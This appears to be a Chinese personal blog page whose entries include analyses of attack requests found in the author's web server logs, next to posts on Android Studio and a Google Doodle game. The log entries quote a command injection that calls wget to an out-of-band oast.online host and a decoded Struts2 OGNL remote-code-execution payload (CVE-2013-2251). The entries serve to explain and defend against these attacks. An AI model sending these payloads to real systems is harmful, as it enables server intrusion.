Wey's note
只是一些隨手筆記
2024年12月12日 星期四
2024年12月3日 星期二
從 Web Log 學習系統漏洞 92
這幾天來上萬次來自美國紐約攻擊的傢伙, 不過都擋下來了
其中一段很有意思:
107.173.254.12 - - [02/Dec/2024:22:53:23 +0800] "GET /Collector/nms/addModifyZTDProxy?ztd_server=127.0.0.1&ztd_port=3333&ztd_username=user&ztd_password=$(/bin/wget$IFShttp://ct6s3r6bldaem9lrvt7gznx5rmwzoep1e.oast.online) HTTP/1.1" 403 240 "-" "-"
估狗了一下關鍵字 oast
OAST, Out-of-band application security testing(帶外應用程式安全測試), 這是一個使用外部伺服器來查看其他不可見的漏洞, 它的引入是為了進一步改進 DAST(動態應用程式安全測試)模型
再使用 Log其中的連結連到網站
上面寫到 Interactsh是用於偵測帶外互動的開源工具, 它是一種旨在檢測導致外部互動的漏洞的工具 (這傢伙幫忙檢查我網站的漏洞準備入侵?)
2024年11月29日 星期五
試用Android Studio
Android Studio是由 Google推出的一款 Android應用程式開發工具, 基於 IntelliJ IDEA平台打造, 它是專為 Android開發者設計的整合開發環境(IDE), 提供了許多功能來協助快速開發 Android應用程式, 支援多種語言(如 Java、Kotlin)並與 Android SDK整合, 最近想來學學新東西於是就去下載回來玩玩
1. 搜尋 Android Studio後連至官網下載
w-studio.idv.tw
2024年10月30日 星期三
2024年10月24日 星期四
2024年9月25日 星期三
Google小遊戲 - 紀念爆米花問世
等了很久 Google終於又有小遊戲推出, 這次是紀念爆米花問世的小遊戲, 有三個角色可以選擇, 獨玩或者與其他人連線組隊, 有點難度, 就算可以順利過完第二關, 但是只剩我一個人就無法繼續玩第三關了(有第三關嗎?)😂
題外話, 奇怪現在用 OBS Studio要擷取螢幕影片時, 在作瀏覽器互動時鍵盤都沒反應, 所以方向鍵也都無法使用, 只好用 Windows內建的螢幕擷取功能來錄影了
#Google #Doodle #Popcorn
2024年9月11日 星期三
從 Web Log 學習系統漏洞 91
從荷蘭(45.148.120.50)來的不少攻擊
截取其中一段:
45.148.120.50 - - [08/Sep/2024:13:00:17 +0800] "GET /index.action?redirect%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1" 404 210 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0"
解碼後得到:
/index.action?redirect:${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=@java.lang.Runtime@getRuntime().exec("sh -c id").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}
這是一個 CVE-2013-2251遠端代碼執行漏洞, 該漏洞出現在 Apache Struts 2框架的 Dynamic Method Invocation (DMI)功能中, 允許攻擊者利用 HTTP請求執行任意代碼, 當應用程式使用 DMI 並且未妥善過濾或限制輸入時, 攻擊者可以通過提交特製的請求, 強制應用程式執行其傳入的任意方法, 這使得攻擊者可以在未經授權的情況下執行伺服器端代碼, 進而可能取得控制權或修改系統資料, 官方已釋出安全性更新, 使用者更新到較新的版本並停用不必要的功能